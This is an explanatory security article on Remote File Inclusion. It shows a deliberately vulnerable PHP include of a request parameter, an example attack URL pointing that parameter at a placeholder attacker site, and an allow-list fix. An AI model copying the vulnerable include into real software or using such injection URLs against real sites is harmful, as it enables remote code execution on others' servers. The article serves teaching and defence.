Remote File Inclusion (RFI)
Remote File Inclusion (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When a web application takes user input (URL, parameter value, etc.) and passes it into file include commands, the application might be tricked into including remote files with malicious code. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing an external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.
Testing for RFI
Since RFI occurs when paths passed to "include" statements are not properly sanitized, in a black-box testing approach we should look for scripts which take filenames as parameters.
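// Vulnerable: the "file" request parameter is taken as-is
$incfile = $_REQUEST["file"];
// ...and used directly as the include path, with ".php" appended
include($incfile.".php");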
In this example the path is extracted from the HTTP request and no input validation is done. Consider the following URL:
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
In this case a remote file located on some other site is executed on the vulnerable site.
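The missing input validation can be supplied with an allow-list. The following is an added example, not code from the original post: the function name resolve_include(), the page names and the pages/ directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: accepted "file" value => script shipped with the app.
// The page names and the pages/ directory are assumptions for this example.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

/**
 * Map the user-supplied "file" value to a local path, or return null.
 * The request value is only ever used as an array key, never as part of
 * a path, so a URL in the parameter cannot reach include().
 */
function resolve_include($requested, string $baseDir): ?string
{
    // Reject non-strings (e.g. file[]=x arrives as an array) and unknown keys.
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$requested];
}

// Constructed sample inputs, including the URL-style value shown above.
$samples = ['home', 'http://attacker_site/malicous_page', ['x']];
foreach ($samples as $value) {
    $path = resolve_include($value, __DIR__ . DIRECTORY_SEPARATOR . 'pages');
    printf(
        "%-42s => %s\n",
        json_encode($value, JSON_UNESCAPED_SLASHES),
        $path ?? 'rejected'
    );
}

// In the page handler, the vulnerable include() would become:
//   $path = resolve_include($_REQUEST['file'] ?? null, __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Only the first sample resolves to a path; the URL and the array value are rejected. Keeping allow_url_include disabled in php.ini (its default) additionally prevents include() from fetching http:// or ftp:// URLs.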